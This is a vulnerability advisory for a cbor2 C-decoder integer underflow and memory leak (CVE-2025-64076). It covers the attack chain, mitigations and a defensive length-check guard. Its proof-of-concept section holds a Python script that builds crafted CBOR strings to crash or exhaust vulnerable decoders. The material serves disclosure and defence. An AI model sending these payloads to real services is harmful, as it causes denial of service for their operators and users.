IPBUF Security Vulnerability Report
CVE-2025-64076 CVSS 7.5 High

CVE-2025-64076: Integer Underflow and Memory Leak in the cbor2 C Extension Decoder

Disclosure date: 2025-11-18

Vulnerability Information

CVE ID: CVE-2025-64076
Vulnerability type: Integer underflow / memory leak / denial of service
CVSS score: 7.5 High
Attack vector: Network (AV:N)
Authentication: None required (PR:N)
User interaction: None required (UI:N)
Affected product: cbor2 (Python CBOR library)

Related tags

CVE-2025-64076, cbor2, integer underflow, memory leak, denial of service, CWE-191, CWE-125, CWE-401, CBOR decoder, Python library vulnerability

Vulnerability Overview

cbor2 is a popular Python library for encoding and decoding CBOR (Concise Binary Object Representation). In November 2025, security researchers found two serious vulnerabilities in the decode_definite_long_string() function of the C extension decoder (source/decoder.c) in cbor2 5.7.0 and earlier. The first is an out-of-bounds read caused by integer underflow (CWE-191, CWE-125): because of a wrong variable reference and a missing state reset in the chunk-processing loop, buffer_length is not reset to zero after a UTF-8 character has been consumed, so the chunk_length computed afterwards becomes negative; when that value is passed to the read() method it can trigger an unbounded read and resource exhaustion. The second is a memory leak (CWE-401): the main processing loop never releases the Python object reference allocated in each iteration (no Py_DECREF), so for CBOR strings longer than 65536 bytes the leak accumulates in proportion to the payload size. An attacker can exploit both remotely and without authentication by sending crafted CBOR data (a definite-length text string with a multi-byte UTF-8 character at the 65536-byte boundary), crashing the target process or exhausting its memory and thereby causing a denial of service. Every application that uses the cbor2 C extension to process untrusted CBOR data is affected, including web APIs, IoT data collectors and message-queue consumers.

Technical Details

The vulnerabilities are located in the decode_definite_long_string() function of cbor2's C extension decoder module, source/decoder.c. This function decodes definite-length long CBOR strings, and it has two key defects when the data contains multi-byte UTF-8 characters:

1. Integer underflow: in the chunk-processing loop, when a multi-byte UTF-8 character spans the 65536-byte boundary, the buffer_length variable is not reset to 0 after the character is consumed. The subsequent computation chunk_length = 65536 - buffer_length therefore yields a negative value. Because that value is passed to the read() method as a signed integer, the negative value is interpreted as a very large unsigned value, triggering an unbounded read and resource exhaustion. An attacker only needs to construct a definite-length text string whose multi-byte UTF-8 character falls exactly on the 65536-byte boundary to trigger this defect.

2. Memory leak: in the main processing loop, the chunk object reference allocated in each iteration is never released (the Py_DECREF call is missing). When a CBOR string longer than 65536 bytes is processed, every iteration leaks one Python object reference, producing a cumulative memory leak. An attacker can exhaust server memory by repeatedly submitting large CBOR payloads.

Both vulnerabilities are remotely exploitable over the network without any authentication or user interaction; successful exploitation crashes the process (a CBORDecodeEOF exception is raised) or exhausts its memory. The fixed version is 5.7.1; the fixing commit is 851473490281f82d82560b2368284ef33cf6e8f9.

Attack Chain Analysis

Step 1: The attacker identifies a target application and confirms that it processes CBOR data with the cbor2 C extension (source/decoder.c).
Step 2: The attacker constructs a malicious CBOR payload containing a definite-length text string whose multi-byte UTF-8 character sits at the 65536-byte boundary.
Step 3: The attacker sends the crafted CBOR data to the target application over the network; no authentication is required.
Step 4: When the cbor2 C extension's decode_definite_long_string() function processes the payload, buffer_length is not reset correctly because of the wrong variable reference.
Step 5: The chunk_length computation underflows to a negative value which, once passed to the read() method, triggers an unbounded read or the memory leak.
Step 6: The target process crashes from resource exhaustion (CBORDecodeEOF exception) or runs out of memory, resulting in a denial of service.

PoC / Exploit Code

⚠️ For security research only
The following code is intended solely for security research and authorized testing; unauthorized use is illegal.
PoC
#!/usr/bin/env python3
"""
PoC for CVE-2025-64076: cbor2 C Extension Decoder Integer Underflow and Memory Leak

This PoC demonstrates the vulnerability in cbor2's decode_definite_long_string()
function where improper handling of UTF-8 characters at 65536-byte chunk
boundaries causes integer underflow and memory leaks.

Affected: cbor2 <= 5.7.0
Fixed: cbor2 >= 5.7.1
"""
import struct
import sys


def create_malicious_cbor_payload():
    """
    Create a malicious CBOR payload that triggers integer underflow in
    decode_definite_long_string() when multi-byte UTF-8 characters are
    positioned at 65536-byte chunk boundaries.
    """
    payload = bytearray()

    # CBOR header for definite-length text string (Major type 3)
    # We need a string length that causes UTF-8 chars to span 65536 boundary
    # Target: 65535 bytes + 1 continuation byte at boundary
    # 65535 = 0xFFFF fits a 16-bit length: 0x79 (major type 3, additional
    # info 25) followed by the big-endian 2-byte length 0xFF 0xFF
    header = bytes([0x79, 0xFF, 0xFF])  # text string, length 65535

    # First 65532 bytes of ASCII data
    payload.extend(b'A' * 65532)

    # Add 3-byte UTF-8 character (e.g., € which is 0xE2 0x82 0xAC)
    # This will cause buffer_length to not be properly reset at boundary
    payload.extend(b'\xe2\x82\xac')  # 3-byte UTF-8 character

    # Prepend CBOR header
    full_payload = header + bytes(payload)
    return bytes(full_payload)


def create_large_cbor_for_memory_leak():
    """
    Create a large CBOR payload to demonstrate memory leak.
    For strings > 65536 bytes, each chunk leaks Python object references.
    """
    # Create CBOR with large definite-length string (> 65536 bytes)
    payload = bytearray()

    # Header: text string with length > 65536
    # 70000 = 0x00011170 does not fit in 16 bits, so the CBOR head is
    # 0x7A (major type 3, additional info 26) plus a big-endian 4-byte length
    length = 70000
    header = bytes([0x7A]) + struct.pack('>I', length)

    # Fill with data containing UTF-8 characters at chunk boundaries
    payload.extend(b'B' * 65534)
    payload.extend(b'\xe2\x82\xac')  # UTF-8 char straddling the 65536 boundary
    payload.extend(b'C' * (length - len(payload)))  # pad to exactly `length` bytes

    return header + bytes(payload)


def test_vulnerability():
    """Test if the cbor2 library is vulnerable"""
    try:
        import cbor2
        from importlib.metadata import version as pkg_version
        # cbor2 may not expose __version__; fall back to package metadata
        print(f"[+] cbor2 version: {getattr(cbor2, '__version__', None) or pkg_version('cbor2')}")
    except ImportError:
        print("[-] cbor2 not installed. Install with: pip install cbor2")
        print("    Note: Install version <= 5.7.0 to test vulnerability")
        return False

    try:
        from cbor2 import CBORDecoder
        from io import BytesIO

        # When the C extension is built it replaces the pure-Python classes, so the
        # decoder's module name shows which implementation (the C one is the vulnerable path) is in use
        print(f"[*] CBORDecoder implementation module: {CBORDecoder.__module__}")

        # Test 1: Integer underflow PoC
        print("\n[*] Test 1: Testing integer underflow vulnerability...")
        try:
            malicious_payload = create_malicious_cbor_payload()
            decoder = CBORDecoder(BytesIO(malicious_payload))
            result = decoder.decode()
            print(f"[!] Unexpected: Decoding succeeded, result length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception caught: {type(e).__name__}: {e}")
            if "memory" in str(e).lower() or "decode" in str(e).lower():
                print("[+] Vulnerability triggered - integer underflow detected")

        # Test 2: Memory leak demonstration
        print("\n[*] Test 2: Testing memory leak vulnerability...")
        print("    Note: Monitor memory usage during decoding")
        try:
            large_payload = create_large_cbor_for_memory_leak()
            decoder = CBORDecoder(BytesIO(large_payload))
            result = decoder.decode()
            print(f"[!] Decoded successfully, length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception: {type(e).__name__}: {e}")

        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 70)
    print("CVE-2025-64076 PoC - cbor2 Integer Underflow and Memory Leak")
    print("=" * 70)
    print("\nVulnerability Description:")
    print("  - Integer underflow in decode_definite_long_string()")
    print("  - Memory leak due to missing Py_DECREF calls")
    print("  - Both can cause denial of service\n")
    test_vulnerability()
    print("\n" + "=" * 70)
    print("Remediation: Upgrade to cbor2 >= 5.7.1")
    print("Commit: 851473490281f82d82560b2368284ef33cf6e8f9")
    print("=" * 70)

Affected Versions

cbor2 <= 5.7.0

Mitigation Guidance

Temporary mitigations
Upgrade cbor2 to 5.7.1 or later immediately. Where an immediate upgrade is not possible, the following temporary mitigations can be applied:
1) validate and filter the length of all CBOR input at the application layer;
2) limit the maximum amount of data decoded in a single CBOR decode call;
3) enable resource limits and monitoring for services that process untrusted CBOR data;
4) consider using the pure-Python decoder instead of the C extension to avoid the vulnerable code, bearing in mind the performance impact.
It is also recommended to review issue #264 and pull request #265 in the GitHub repository agronholm/cbor2 for further details of the fix.
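A pre-decode guard implementing mitigations 1 and 2 above, added here as an example (it is not code from this advisory or from the cbor2 project): it parses only the head of the outermost CBOR item, rejects any payload or declared string length above a size limit, and checks that a declared definite length is actually present, before the bytes ever reach a decoder. MAX_CBOR_BYTES is an assumed policy value, and the version gate encodes the fixed release named above.

```python
import struct

MAX_CBOR_BYTES = 64 * 1024  # assumed policy limit; tune per application
FIXED_VERSION = (5, 7, 1)   # first cbor2 release containing the fix


def cbor2_is_fixed(version_string):
    """True if an installed cbor2 version string (e.g. "5.7.1") is >= 5.7.1."""
    parts = tuple(int(p) for p in version_string.split(".")[:3])
    return parts >= FIXED_VERSION


def cbor_head(data):
    """Parse the head of the first CBOR item without decoding its payload.

    Returns (major_type, argument, head_size). For major types 2 and 3 the
    argument is the declared byte length; None means indefinite length.
    """
    if not data:
        raise ValueError("empty CBOR input")
    major, info = data[0] >> 5, data[0] & 0x1F
    if info < 24:
        return major, info, 1          # argument is encoded in the initial byte
    if info == 31:
        return major, None, 1          # indefinite-length item
    fmt = {24: ">B", 25: ">H", 26: ">I", 27: ">Q"}.get(info)
    if fmt is None:
        raise ValueError(f"reserved additional information value {info}")
    size = struct.calcsize(fmt)
    if len(data) < 1 + size:
        raise ValueError("truncated CBOR head")
    (arg,) = struct.unpack(fmt, data[1:1 + size])
    return major, arg, 1 + size


def reject_reason(data, max_bytes=MAX_CBOR_BYTES):
    """Return why data must not reach a cbor2 decoder, or None if it may."""
    if len(data) > max_bytes:
        return f"payload of {len(data)} bytes exceeds limit {max_bytes}"
    try:
        major, length, head_size = cbor_head(data)
    except ValueError as exc:
        return str(exc)
    if major in (2, 3) and length is not None:   # byte string / text string
        if length > max_bytes:
            return f"declared string length {length} exceeds limit {max_bytes}"
        if head_size + length > len(data):
            return "declared string length exceeds the bytes actually present"
    return None
```

The guard only inspects the outermost item; nested strings inside arrays or maps are still bounded by the raw payload limit.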

References
